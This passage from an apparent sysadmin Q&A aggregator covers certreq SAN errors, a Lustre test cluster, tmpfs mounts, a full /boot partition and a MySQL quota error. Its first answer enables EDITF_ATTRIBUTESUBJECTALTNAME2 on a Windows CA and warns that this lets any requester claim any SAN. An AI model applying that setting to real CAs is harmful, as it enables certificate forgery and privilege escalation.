with a Windows Certificate Authority, so how do I do this (preferably using the off-line certreq.exe tool)?
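    The error itself suggests the policy module insists on building a Subject Alternative Name and cannot, because the offline request carries no DNS name the CA can look up for the requester. A commonly documented workaround is to let the CA accept a SAN passed as a request attribute and then supply the radius server's FQDN at submission time. A sketch (the hostname is a placeholder, and note that enabling EDITF_ATTRIBUTESUBJECTALTNAME2 lets any requester assert any SAN, which has real security implications on a production CA):

        :: on the CA: accept SAN as a request attribute, then restart the service
        certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
        net stop certsvc
        net start certsvc

        :: resubmit, passing the SAN alongside the template name
        certreq -submit -attrib "CertificateTemplate:Machine\nSAN:dns=radius.thedomain.com" server.csr

    The \n inside the -attrib string is literal; certreq uses it to separate attributes.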

    Read the article

  • Lustre - issues with simple setup

    - by ethrbunny
    Issue: I'm trying to assess the (possible) use of Lustre for our group. To this end I've been trying to create a simple system to explore the nuances. I can't seem to get past the 'llmount.sh' test with any degree of success. What I've done: Each system (throwaway PCs with 70Gb HD, 2Gb RAM) is formatted with CentOS 6.2. I then update everything and install the Lustre kernel from downloads.whamcloud.com and add on the various (appropriate) lustre and e2fs RPM files. Systems are rebooted and tested with 'llmount.sh' (and then cleared with 'llmountcleanup.sh'). All is well to this point. First I create an MDS/MDT system via: /usr/sbin/mkfs.lustre --mgs --mdt --fsname=lustre --device-size=200000 --param sys.timeout=20 --mountfsoptions=errors=remount-ro,user_xattr,acl --param lov.stripesize=1048576 --param lov.stripecount=0 --param mdt.identity_upcall=/usr/sbin/l_getidentity --backfstype ldiskfs --reformat /tmp/lustre-mdt1 and then mkdir -p /mnt/mds1 mount -t lustre -o loop,user_xattr,acl /tmp/lustre-mdt1 /mnt/mds1 Next I take 3 systems and create a 2Gb loop mount via: /usr/sbin/mkfs.lustre --ost --fsname=lustre --device-size=200000 --param sys.timeout=20 --mgsnode=lustre_MDS0@tcp --backfstype ldiskfs --reformat /tmp/lustre-ost1 mkdir -p /mnt/ost1 mount -t lustre -o loop /tmp/lustre-ost1 /mnt/ost1 The logs on the MDT box show the OSS boxes connecting up. All appears ok. Last I create a client and attach to the MDT box: mkdir -p /mnt/lustre mount -t lustre -o user_xattr,acl,flock luster_MDS0@tcp:/lustre /mnt/lustre Again, the log on the MDT box shows the client connection. Appears to be successful. Here's where the issues (appear to) start. If I do a 'df -h' on the client it hangs after showing the system drives. If I attempt to create files (via 'dd') on the lustre mount the session hangs and the job can't be killed. Rebooting the client is the only solution. If I do a 'lctl dl' from the client it shows that only 2/3 OST boxes are found and 'UP'. [root@lfsclient0 etc]# lctl dl 0 UP mgc MGC10.127.24.42@tcp 282d249f-fcb2-b90f-8c4e-2f1415485410 5 1 UP lov lustre-clilov-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 4 2 UP lmv lustre-clilmv-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 4 3 UP mdc lustre-MDT0000-mdc-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 5 4 UP osc lustre-OST0000-osc-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 5 5 UP osc lustre-OST0003-osc-ffff880037e4d400 00fc176e-3156-0490-44e1-da911be9f9df 5 Doing a 'lfs df' from the client shows: [root@lfsclient0 etc]# lfs df UUID 1K-blocks Used Available Use% Mounted on lustre-MDT0000_UUID 149944 16900 123044 12% /mnt/lustre[MDT:0] OST0000 : inactive device OST0001 : Resource temporarily unavailable OST0002 : Resource temporarily unavailable lustre-OST0003_UUID 187464 24764 152636 14% /mnt/lustre[OST:3] filesystem summary: 187464 24764 152636 14% /mnt/lustre Given that each OSS box has a 2Gb (loop) mount I would expect to see this reflected in available size. There are no errors on the MDS/MDT box to indicate that multiple OSS/OST boxes have been lost. EDIT: each system has all other systems defined in /etc/hosts and entries in iptables to provide access. SO: I'm clearly making several mistakes. Any pointers as to where to start correcting them?
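    Given that two OSTs show "Resource temporarily unavailable" while a third is UP, one thing worth ruling out before anything Lustre-specific is LNET reachability from the client to each OSS individually - LNET over TCP uses port 988 by default, and a missing iptables rule on just some of the boxes would produce exactly this partial picture. A sketch of the checks (the NIDs are placeholders for your hosts):

        # from the client: can LNET reach each OSS?
        lctl ping 10.127.24.43@tcp
        lctl ping 10.127.24.44@tcp
        # on each OSS: is the LNET port actually open?
        iptables -L -n | grep 988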

    Read the article

  • What is the default file system of /var/run, /var/lock

    - by Casey
    Trying to figure out if my /var/run is using disk or not. See the command output: $ df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg0-root 40G 15G 26G 36% / none 3.9G 340K 3.9G 1% /dev none 3.9G 1.1M 3.9G 1% /dev/shm tmpfs 3.9G 600K 3.9G 1% /tmp none 3.9G 452K 3.9G 1% /var/run none 3.9G 0 3.9G 0% /var/lock none 3.9G 0 3.9G 0% /lib/init/rw /dev/md0 236M 59M 165M 27% /boot /dev/mapper/vg0-home 60G 58G 2.3G 97% /home
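    The "none" in the device column is the hint: on this release /var/run and /var/lock are tmpfs mounts, so their contents live in RAM (spilling to swap only under memory pressure) rather than on disk. The filesystem type column of the mount table confirms it; a quick check:

        # "type tmpfs" in the output means RAM-backed, not on-disk
        mount | grep -E '/var/(run|lock)'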

    Read the article

  • Can't see my iPod

    - by Tom Brito
    When I plug in my 32GB iPod Touch 4G, it mounts a 1GB drive. Rhythmbox does not react, neither does Banshee. Any ideas how to copy my music? The output of df is: Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda1 28834716 4347480 23022512 16% / udev 1026788 288 1026500 1% /dev none 1026788 1496 1025292 1% /dev/shm none 1026788 204 1026584 1% /var/run none 1026788 0 1026788 0% /var/lock none 1026788 0 1026788 0% /lib/init/rw /dev/sda6 96124904 62709456 28532496 69% /home

    Read the article

  • Why is my hard drive mounted on /boot?

    - by divided
    I was doing an update and it said that the drive was full. Here is df -h: Filesystem Size Used Avail Use% Mounted on 78G 2.7G 72G 4% / none 242M 184K 242M 1% /dev none 247M 0 247M 0% /dev/shm none 247M 48K 247M 1% /var/run none 247M 0 247M 0% /var/lock none 247M 0 247M 0% /lib/init/rw /dev/sda1 228M 225M 0 100% /boot How can I fix /dev/sda1 being mounted on /boot?
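    Nothing is wrong with the mount itself: /dev/sda1 is a separate 228 MB boot partition (the 78 GB root lives elsewhere), and it fills up as kernel updates accumulate, which is what broke the update. Purging kernels you no longer boot usually frees it; a sketch, with an example version number:

        uname -r                  # note the running kernel - keep this one
        dpkg -l 'linux-image-*'   # see which kernel packages are installed
        # purge an old one (version below is an example)
        sudo apt-get purge linux-image-2.6.32-21-generic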

    Read the article

  • Mysql: Disk is full writing

    - by elma
    Hi there, I'm having some problems with my mysql server lately, so I've decided to check the error logs: [root@LSN-D1179 log]# tail -10 mysqld.log 100325 19:30:03 [ERROR] /usr/libexec/mysqld: Table './lfe/actions' is marked as crashed and should be repaired 100325 19:30:03 [ERROR] /usr/libexec/mysqld: Table './lfe/actions' is marked as crashed and should be repaired 100325 19:30:18 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_task_logs.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:34:34 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_profile_portal_views.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:39:46 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_posts.TMD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:40:18 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_task_logs.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:44:34 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_profile_portal_views.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:49:46 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_posts.TMD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:50:18 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_task_logs.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs 100325 19:54:34 [ERROR] /usr/libexec/mysqld: Disk is full writing './omuz/ibf_profile_portal_views.MYD' (Errcode: 122). Waiting for someone to free space... Retry in 60 secs And here is my df -h output: [root@LSN-D1179 log]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup00-LogVol00 143G 6.2G 129G 5% / /dev/sda1 99M 12M 83M 13% /boot tmpfs 490M 0 490M 0% /dev/shm As you can see, I have plenty of free space, so I couldn't figure out these "Disk is full" errors in mysqld.log. Does anyone know what I should do to fix this? Ugur
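    Errcode 122 is the detail that matters: despite the "Disk is full" wording, errno 122 on Linux is EDQUOT - a disk quota being exceeded - not ENOSPC. So overall free space is irrelevant here; the per-user quota that applies to the mysql user (or to those database directories, e.g. one imposed by a hosting panel) is what is being hit. A sketch of the checks:

        perror 122         # MySQL's own errno decoder: "Disk quota exceeded"
        quota -u mysql     # the mysql user's quota, if user quotas are enabled
        repquota -a        # quota report for all mounted filesystems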

    Read the article
